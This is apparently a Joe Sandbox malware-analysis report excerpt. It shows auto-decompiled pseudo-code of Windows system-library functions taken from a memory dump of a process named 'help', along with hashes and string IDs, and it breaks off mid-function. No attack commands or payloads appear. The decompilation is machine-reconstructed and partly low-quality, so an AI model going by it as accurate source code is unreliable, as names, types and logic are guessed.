                            • Opcode Fuzzy Hash: 43c2db053a77b88c41a7200cca583831e3f5ceebc8e6270dbb339153d6758eb6
                            • Instruction Fuzzy Hash: C861F831A00784DFDF21DBA8C854B7EB7A9EB49714F280ADDE611EB2D2C7349941C791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 80%
                            			E03890EA5(void* __ecx, void* __edx) {
                            				signed int _v20;
                            				char _v24;
                            				intOrPtr _v28;
                            				unsigned int _v32;
                            				signed int _v36;
                            				intOrPtr _v40;
                            				char _v44;
                            				intOrPtr _v64;
                            				void* __ebx;
                            				void* __edi;
                            				signed int _t58;
                            				unsigned int _t60;
                            				intOrPtr _t62;
                            				char* _t67;
                            				char* _t69;
                            				void* _t80;
                            				void* _t83;
                            				intOrPtr _t93;
                            				intOrPtr _t115;
                            				char _t117;
                            				void* _t120;
                            
                            				_t83 = __edx;
                            				_t117 = 0;
                            				_t120 = __ecx;
                            				_v44 = 0;
                            				if(E0388FF69(__ecx,  &_v44,  &_v32) < 0) {
                            					L24:
                            					_t109 = _v44;
                            					if(_v44 != 0) {
                            						E03891074(_t83, _t120, _t109, _t117, _t117);
                            					}
                            					L26:
                            					return _t117;
                            				}
                            				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                            				_t5 = _t83 + 1; // 0x1
                            				_v36 = _t5 << 0xc;
                            				_v40 = _t93;
                            				_t58 =  *(_t93 + 0xc) & 0x40000000;
                            				asm("sbb ebx, ebx");
                            				_t83 = ( ~_t58 & 0x0000003c) + 4;
                            				if(_t58 != 0) {
                            					_push(0);
                            					_push(0x14);
                            					_push( &_v24);
                            					_push(3);
                            					_push(_t93);
                            					_push(0xffffffff);
                            					_t80 = E03809730();
                            					_t115 = _v64;
                            					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                            						_push(_t93);
                            						E0388A80D(_t115, 1, _v20, _t117);
                            						_t83 = 4;
                            					}
                            				}
                            				if(E0388A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                            					goto L24;
                            				}
                            				_t60 = _v32;
                            				_t97 = (_t60 != 0x100000) + 1;
                            				_t83 = (_v44 -  *0x38b8b04 >> 0x14) + (_v44 -  *0x38b8b04 >> 0x14);
                            				_v28 = (_t60 != 0x100000) + 1;
                            				_t62 = _t83 + (_t60 >> 0x14) * 2;
                            				_v40 = _t62;
                            				if(_t83 >= _t62) {
                            					L10:
                            					asm("lock xadd [eax], ecx");
                            					asm("lock xadd [eax], ecx");
                            					if(E037E7D50() == 0) {
                            						_t67 = 0x7ffe0380;
                            					} else {
                            						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                            					}
                            					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                            						E0388138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                            					}
                            					if(E037E7D50() == 0) {
                            						_t69 = 0x7ffe0388;
                            					} else {
                            						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                            					}
                            					if( *_t69 != 0) {
                            						E0387FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                            					}
                            					if(( *0x38b8724 & 0x00000008) != 0) {
                            						E038852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                            					}
                            					_t117 = _v44;
                            					goto L26;
                            				}
                            				while(E038915B5(0x38b8ae4, _t83, _t97, _t97) >= 0) {
                            					_t97 = _v28;
                            					_t83 = _t83 + 2;
                            					if(_t83 < _v40) {
                            						continue;
                            					}
                            					goto L10;
                            				}
                            				goto L24;
                            			}

























                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: `
                            • API String ID: 0-2679148245
                            • Opcode ID: 196209e6cc1de29e08042d28df6db85ed90e9ae7f660c6915bb7e584a79de0f7
                            • Instruction ID: d041490c77f1f2bb00f29dd38db66d54e044eb90e0c750c8afe998a27683470c
                            • Opcode Fuzzy Hash: 196209e6cc1de29e08042d28df6db85ed90e9ae7f660c6915bb7e584a79de0f7
                            • Instruction Fuzzy Hash: 0151C4712083829FE724DFA9D884B1BB7E5EBC4704F0809AEF556DB290D771E905C762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E037FF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				char* _v20;
                            				intOrPtr _v24;
                            				char _v28;
                            				intOrPtr _v32;
                            				char _v36;
                            				char _v44;
                            				char _v52;
                            				intOrPtr _v56;
                            				char _v60;
                            				intOrPtr _v72;
                            				void* _t51;
                            				void* _t58;
                            				signed short _t82;
                            				short _t84;
                            				signed int _t91;
                            				signed int _t100;
                            				signed short* _t103;
                            				void* _t108;
                            				intOrPtr* _t109;
                            
                            				_t103 = __ecx;
                            				_t82 = __edx;
                            				_t51 = E037E4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                            				if(_t51 >= 0) {
                            					_push(0x21);
                            					_push(3);
                            					_v56 =  *0x7ffe02dc;
                            					_v20 =  &_v52;
                            					_push( &_v44);
                            					_v28 = 0x18;
                            					_push( &_v28);
                            					_push(0x100020);
                            					_v24 = 0;
                            					_push( &_v60);
                            					_v16 = 0x40;
                            					_v12 = 0;
                            					_v8 = 0;
                            					_t58 = E03809830();
                            					_t87 =  *[fs:0x30];
                            					_t108 = _t58;
                            					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                            					if(_t108 < 0) {
                            						L11:
                            						_t51 = _t108;
                            					} else {
                            						_push(4);
                            						_push(8);
                            						_push( &_v36);
                            						_push( &_v44);
                            						_push(_v60);
                            						_t108 = E03809990();
                            						if(_t108 < 0) {
                            							L10:
                            							_push(_v60);
                            							E038095D0();
                            							goto L11;
                            						} else {
                            							_t18 = _t82 + 0x18; // 0x1d1cd81a
                            							_t109 = L037E4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                            							if(_t109 == 0) {
                            								_t108 = 0xc0000017;
                            								goto L10;
                            							} else {
                            								_t21 = _t109 + 0x18; // 0x18
                            								 *((intOrPtr*)(_t109 + 4)) = _v60;
                            								 *_t109 = 1;
                            								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                            								 *(_t109 + 0xe) = _t82;
                            								 *((intOrPtr*)(_t109 + 8)) = _v56;
                            								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                            								_t29 =  &(_t103[2]); // 0x20031d1c
                            								E0380F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
                            								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                            								 *((short*)(_t109 + 0xc)) =  *_t103;
                            								_t91 =  *_t103 & 0x0000ffff;
                            								_t34 =  &(_t103[2]); // 0x20031d1c
                            								_t100 = _t91 & 0xfffffffe;
                            								_t84 = 0x5c;
                            								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
                            									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                            										_push(_v60);
                            										E038095D0();
                            										L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                            										_t51 = 0xc0000106;
                            									} else {
                            										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                            										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                            										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                            										goto L5;
                            									}
                            								} else {
                            									L5:
                            									 *_a4 = _t109;
                            									_t51 = 0;
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _t51;
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                            • Instruction ID: 046106c03eef32d36db05d1f291d5b6be004cc1292ee7d3ed25d62e2989065dc
                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                            • Instruction Fuzzy Hash: C1515A755057109FC321DF69C840A6BBBE8FF48710F10892DFA959B6A0E7B4E914CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E03843540(intOrPtr _a4) {
                            				signed int _v12;
                            				intOrPtr _v88;
                            				intOrPtr _v92;
                            				char _v96;
                            				char _v352;
                            				char _v1072;
                            				intOrPtr _v1140;
                            				intOrPtr _v1148;
                            				char _v1152;
                            				char _v1156;
                            				char _v1160;
                            				char _v1164;
                            				char _v1168;
                            				char* _v1172;
                            				short _v1174;
                            				char _v1176;
                            				char _v1180;
                            				char _v1192;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				short _t41;
                            				short _t42;
                            				intOrPtr _t80;
                            				intOrPtr _t81;
                            				signed int _t82;
                            				void* _t83;
                            
                            				_v12 =  *0x38bd360 ^ _t82;
                            				_t41 = 0x14;
                            				_v1176 = _t41;
                            				_t42 = 0x16;
                            				_v1174 = _t42;
                            				_v1164 = 0x100;
                            				_v1172 = L"BinaryHash";
                            				_t81 = E03800BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                            				if(_t81 < 0) {
                            					L11:
                            					_t75 = _t81;
                            					E03843706(0, _t81, _t79, _t80);
                            					L12:
                            					if(_a4 != 0xc000047f) {
                            						E0380FA60( &_v1152, 0, 0x50);
                            						_v1152 = 0x60c201e;
                            						_v1148 = 1;
                            						_v1140 = E03843540;
                            						E0380FA60( &_v1072, 0, 0x2cc);
                            						_push( &_v1072);
                            						E0381DDD0( &_v1072, _t75, _t79, _t80, _t81);
                            						E03850C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                            						_push(_v1152);
                            						_push(0xffffffff);
                            						E038097C0();
                            					}
                            					return E0380B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                            				}
                            				_t79 =  &_v352;
                            				_t81 = E03843971(0, _a4,  &_v352,  &_v1156);
                            				if(_t81 < 0) {
                            					goto L11;
                            				}
                            				_t75 = _v1156;
                            				_t79 =  &_v1160;
                            				_t81 = E03843884(_v1156,  &_v1160,  &_v1168);
                            				if(_t81 >= 0) {
                            					_t80 = _v1160;
                            					E0380FA60( &_v96, 0, 0x50);
                            					_t83 = _t83 + 0xc;
                            					_push( &_v1180);
                            					_push(0x50);
                            					_push( &_v96);
                            					_push(2);
                            					_push( &_v1176);
                            					_push(_v1156);
                            					_t81 = E03809650();
                            					if(_t81 >= 0) {
                            						if(_v92 != 3 || _v88 == 0) {
                            							_t81 = 0xc000090b;
                            						}
                            						if(_t81 >= 0) {
                            							_t75 = _a4;
                            							_t79 =  &_v352;
                            							E03843787(_a4,  &_v352, _t80);
                            						}
                            					}
                            					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                            				}
                            				_push(_v1156);
                            				E038095D0();
                            				if(_t81 >= 0) {
                            					goto L12;
                            				} else {
                            					goto L11;
                            				}
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: BinaryHash
                            • API String ID: 2994545307-2202222882
                            • Opcode ID: ee5f22c5c2cc20db6f10baa5e693e1093ba94b8de928bb17385569fde90a1d0b
                            • Instruction ID: 263799420500c90f31d0ec9160de7f8b67841d8db4defa6a80b1088232bba310
                            • Opcode Fuzzy Hash: ee5f22c5c2cc20db6f10baa5e693e1093ba94b8de928bb17385569fde90a1d0b
                            • Instruction Fuzzy Hash: 724176F5D0062D9BDB61DA94CC80FDEB77CAB44714F0045E5EA09EB280DB709E988F95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E038905AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                            				signed int _v20;
                            				char _v24;
                            				signed int _v28;
                            				char _v32;
                            				signed int _v36;
                            				intOrPtr _v40;
                            				void* __ebx;
                            				void* _t35;
                            				signed int _t42;
                            				char* _t48;
                            				signed int _t59;
                            				signed char _t61;
                            				signed int* _t79;
                            				void* _t88;
                            
                            				_v28 = __edx;
                            				_t79 = __ecx;
                            				if(E038907DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                            					L13:
                            					_t35 = 0;
                            					L14:
                            					return _t35;
                            				}
                            				_t61 = __ecx[1];
                            				_t59 = __ecx[0xf];
                            				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                            				_v36 = _a8 << 0xc;
                            				_t42 =  *(_t59 + 0xc) & 0x40000000;
                            				asm("sbb esi, esi");
                            				_t88 = ( ~_t42 & 0x0000003c) + 4;
                            				if(_t42 != 0) {
                            					_push(0);
                            					_push(0x14);
                            					_push( &_v24);
                            					_push(3);
                            					_push(_t59);
                            					_push(0xffffffff);
                            					if(E03809730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                            						_push(_t61);
                            						E0388A80D(_t59, 1, _v20, 0);
                            						_t88 = 4;
                            					}
                            				}
                            				_t35 = E0388A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                            				if(_t35 < 0) {
                            					goto L14;
                            				}
                            				E03891293(_t79, _v40, E038907DF(_t79, _v28,  &_a4,  &_a8, 1));
                            				if(E037E7D50() == 0) {
                            					_t48 = 0x7ffe0380;
                            				} else {
                            					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                            				}
                            				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                            					E0388138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                            				}
                            				goto L13;
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: `
                            • API String ID: 0-2679148245
                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                            • Instruction ID: f3303ecd0ef59bdfa47cb5bbf4c7d0e1aba89555f957802b8959b540813a20cc
                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                            • Instruction Fuzzy Hash: F73103722043496BEB11DFA8CC44F96B799ABC4754F084166F944DF680D770E904C792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E03843884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                            				char _v8;
                            				intOrPtr _v12;
                            				intOrPtr* _v16;
                            				char* _v20;
                            				short _v22;
                            				char _v24;
                            				intOrPtr _t38;
                            				short _t40;
                            				short _t41;
                            				void* _t44;
                            				intOrPtr _t47;
                            				void* _t48;
                            
                            				_v16 = __edx;
                            				_t40 = 0x14;
                            				_v24 = _t40;
                            				_t41 = 0x16;
                            				_v22 = _t41;
                            				_t38 = 0;
                            				_v12 = __ecx;
                            				_push( &_v8);
                            				_push(0);
                            				_push(0);
                            				_push(2);
                            				_t43 =  &_v24;
                            				_v20 = L"BinaryName";
                            				_push( &_v24);
                            				_push(__ecx);
                            				_t47 = 0;
                            				_t48 = E03809650();
                            				if(_t48 >= 0) {
                            					_t48 = 0xc000090b;
                            				}
                            				if(_t48 != 0xc0000023) {
                            					_t44 = 0;
                            					L13:
                            					if(_t48 < 0) {
                            						L16:
                            						if(_t47 != 0) {
                            							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                            						}
                            						L18:
                            						return _t48;
                            					}
                            					 *_v16 = _t38;
                            					 *_a4 = _t47;
                            					goto L18;
                            				}
                            				_t47 = L037E4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                            				if(_t47 != 0) {
                            					_push( &_v8);
                            					_push(_v8);
                            					_push(_t47);
                            					_push(2);
                            					_push( &_v24);
                            					_push(_v12);
                            					_t48 = E03809650();
                            					if(_t48 < 0) {
                            						_t44 = 0;
                            						goto L16;
                            					}
                            					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                            						_t48 = 0xc000090b;
                            					}
                            					_t44 = 0;
                            					if(_t48 < 0) {
                            						goto L16;
                            					} else {
                            						_t17 = _t47 + 0xc; // 0xc
                            						_t38 = _t17;
                            						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                            							_t48 = 0xc000090b;
                            						}
                            						goto L13;
                            					}
                            				}
                            				_t48 = _t48 + 0xfffffff4;
                            				goto L18;
                            			}
















                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: BinaryName
                            • API String ID: 2994545307-215506332
                            • Opcode ID: 6644b56cb3223eeab4a58e7f2d90f5acae58131f7f0a4e46b9f3c93ac6574ae5
                            • Instruction ID: 00b30b5a5758daff9365ba503e41bc0b453b52589d0da5ce3f8a2007c8209a15
                            • Opcode Fuzzy Hash: 6644b56cb3223eeab4a58e7f2d90f5acae58131f7f0a4e46b9f3c93ac6574ae5
                            • Instruction Fuzzy Hash: AB31F43A90060EBFEB15DA98C945E6FFB78EB81720F0541A9E814EB690D770DE10C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 33%
                            			E037FD294(void* __ecx, char __edx, void* __eflags) {
                            				signed int _v8;
                            				char _v52;
                            				signed int _v56;
                            				signed int _v60;
                            				intOrPtr _v64;
                            				char* _v68;
                            				intOrPtr _v72;
                            				char _v76;
                            				signed int _v84;
                            				intOrPtr _v88;
                            				char _v92;
                            				intOrPtr _v96;
                            				intOrPtr _v100;
                            				char _v104;
                            				char _v105;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t35;
                            				char _t38;
                            				signed int _t40;
                            				signed int _t44;
                            				signed int _t52;
                            				void* _t53;
                            				void* _t55;
                            				void* _t61;
                            				intOrPtr _t62;
                            				void* _t64;
                            				signed int _t65;
                            				signed int _t66;
                            
                            				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                            				_v8 =  *0x38bd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                            				_v105 = __edx;
                            				_push( &_v92);
                            				_t52 = 0;
                            				_push(0);
                            				_push(0);
                            				_push( &_v104);
                            				_push(0);
                            				_t59 = __ecx;
                            				_t55 = 2;
                            				if(E037E4120(_t55, __ecx) < 0) {
                            					_t35 = 0;
                            					L8:
                            					_pop(_t61);
                            					_pop(_t64);
                            					_pop(_t53);
                            					return E0380B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                            				}
                            				_v96 = _v100;
                            				_t38 = _v92;
                            				if(_t38 != 0) {
                            					_v104 = _t38;
                            					_v100 = _v88;
                            					_t40 = _v84;
                            				} else {
                            					_t40 = 0;
                            				}
                            				_v72 = _t40;
                            				_v68 =  &_v104;
                            				_push( &_v52);
                            				_v76 = 0x18;
                            				_push( &_v76);
                            				_v64 = 0x40;
                            				_v60 = _t52;
                            				_v56 = _t52;
                            				_t44 = E038098D0();
                            				_t62 = _v88;
                            				_t65 = _t44;
                            				if(_t62 != 0) {
                            					asm("lock xadd [edi], eax");
                            					if((_t44 | 0xffffffff) != 0) {
                            						goto L4;
                            					}
                            					_push( *((intOrPtr*)(_t62 + 4)));
                            					E038095D0();
                            					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                            					goto L4;
                            				} else {
                            					L4:
                            					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                            					if(_t65 >= 0) {
                            						_t52 = 1;
                            					} else {
                            						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                            							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                            						}
                            					}
                            					_t35 = _t52;
                            					goto L8;
                            				}
                            			}


































                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 80f00c5941826f579dd940faa9b68c2fdbc1448c91da6e9957b413107720357a
                            • Instruction ID: baacb9eb79dbe63809d75e002c507b9ebf8390914fa37b53cfbdeed73e5c4f5a
                            • Opcode Fuzzy Hash: 80f00c5941826f579dd940faa9b68c2fdbc1448c91da6e9957b413107720357a
                            • Instruction Fuzzy Hash: 13317CB6508305EFC721DF68C984A6BBBE8FF89654F04096EFA9487350E634DD04DB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E037D1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                            				intOrPtr _v8;
                            				char _v16;
                            				intOrPtr* _t26;
                            				intOrPtr _t29;
                            				void* _t30;
                            				signed int _t31;
                            
                            				_t27 = __ecx;
                            				_t29 = __edx;
                            				_t31 = 0;
                            				_v8 = __edx;
                            				if(__edx == 0) {
                            					L18:
                            					_t30 = 0xc000000d;
                            					goto L12;
                            				} else {
                            					_t26 = _a4;
                            					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                            						goto L18;
                            					} else {
                            						E0380BB40(__ecx,  &_v16, __ecx);
                            						_push(_t26);
                            						_push(0);
                            						_push(0);
                            						_push(_t29);
                            						_push( &_v16);
                            						_t30 = E0380A9B0();
                            						if(_t30 >= 0) {
                            							_t19 =  *_t26;
                            							if( *_t26 != 0) {
                            								goto L7;
                            							} else {
                            								 *_a8 =  *_a8 & 0;
                            							}
                            						} else {
                            							if(_t30 != 0xc0000023) {
                            								L9:
                            								_push(_t26);
                            								_push( *_t26);
                            								_push(_t31);
                            								_push(_v8);
                            								_push( &_v16);
                            								_t30 = E0380A9B0();
                            								if(_t30 < 0) {
                            									L12:
                            									if(_t31 != 0) {
                            										L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                            									}
                            								} else {
                            									 *_a8 = _t31;
                            								}
                            							} else {
                            								_t19 =  *_t26;
                            								if( *_t26 == 0) {
                            									_t31 = 0;
                            								} else {
                            									L7:
                            									_t31 = L037E4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                            								}
                            								if(_t31 == 0) {
                            									_t30 = 0xc0000017;
                            								} else {
                            									goto L9;
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _t30;
                            			}










                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: WindowsExcludedProcs
                            • API String ID: 0-3583428290
                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                            • Instruction ID: 46956ccca752d5460f918971f30990ca7a615987e89a86664530670274945b67
                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                            • Instruction Fuzzy Hash: 6121D477601228EBCB62DA9AC940F6BBBFDEF45A50F0944A5FD08DB200D634DD00D7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037EF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                            				intOrPtr _t13;
                            				intOrPtr _t14;
                            				signed int _t16;
                            				signed char _t17;
                            				intOrPtr _t19;
                            				intOrPtr _t21;
                            				intOrPtr _t23;
                            				intOrPtr* _t25;
                            
                            				_t25 = _a8;
                            				_t17 = __ecx;
                            				if(_t25 == 0) {
                            					_t19 = 0xc00000f2;
                            					L8:
                            					return _t19;
                            				}
                            				if((__ecx & 0xfffffffe) != 0) {
                            					_t19 = 0xc00000ef;
                            					goto L8;
                            				}
                            				_t19 = 0;
                            				 *_t25 = 0;
                            				_t21 = 0;
                            				_t23 = "Actx ";
                            				if(__edx != 0) {
                            					if(__edx == 0xfffffffc) {
                            						L21:
                            						_t21 = 0x200;
                            						L5:
                            						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                            						 *_t25 = _t13;
                            						L6:
                            						if(_t13 == 0) {
                            							if((_t17 & 0x00000001) != 0) {
                            								 *_t25 = _t23;
                            							}
                            						}
                            						L7:
                            						goto L8;
                            					}
                            					if(__edx == 0xfffffffd) {
                            						 *_t25 = _t23;
                            						_t13 = _t23;
                            						goto L6;
                            					}
                            					_t13 =  *((intOrPtr*)(__edx + 0x10));
                            					 *_t25 = _t13;
                            					L14:
                            					if(_t21 == 0) {
                            						goto L6;
                            					}
                            					goto L5;
                            				}
                            				_t14 = _a4;
                            				if(_t14 != 0) {
                            					_t16 =  *(_t14 + 0x14) & 0x00000007;
                            					if(_t16 <= 1) {
                            						_t21 = 0x1f8;
                            						_t13 = 0;
                            						goto L14;
                            					}
                            					if(_t16 == 2) {
                            						goto L21;
                            					}
                            					if(_t16 != 4) {
                            						_t19 = 0xc00000f0;
                            						goto L7;
                            					}
                            					_t13 = 0;
                            					goto L6;
                            				} else {
                            					_t21 = 0x1f8;
                            					goto L5;
                            				}
                            			}












                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: Actx
                            • API String ID: 0-89312691
                            • Opcode ID: e909479ce35a8d8c173abe9a820202905cda3c2c21754c159cc1b56b5b89e052
                            • Instruction ID: 24ca0908e2cb8e64164f0708d1f3bd8332df39fd92f02a184092dfb3cd0c30dd
                            • Opcode Fuzzy Hash: e909479ce35a8d8c173abe9a820202905cda3c2c21754c159cc1b56b5b89e052
                            • Instruction Fuzzy Hash: 9211B6353056028BE724CE1D8490736B29AEB9E624FAB453EE865CBB91D770C840B380
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E03878DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                            				intOrPtr _t35;
                            				void* _t41;
                            
                            				_t40 = __esi;
                            				_t39 = __edi;
                            				_t38 = __edx;
                            				_t35 = __ecx;
                            				_t34 = __ebx;
                            				_push(0x74);
